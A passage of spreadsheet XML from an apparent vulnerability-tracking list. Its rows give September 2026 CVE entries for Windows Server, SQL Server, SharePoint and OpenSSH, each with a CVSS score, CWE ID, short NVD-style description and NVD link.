      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68887</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69428</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K23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5" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69443</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K23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38" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69607</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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43" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K244"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244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K24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245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K247" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
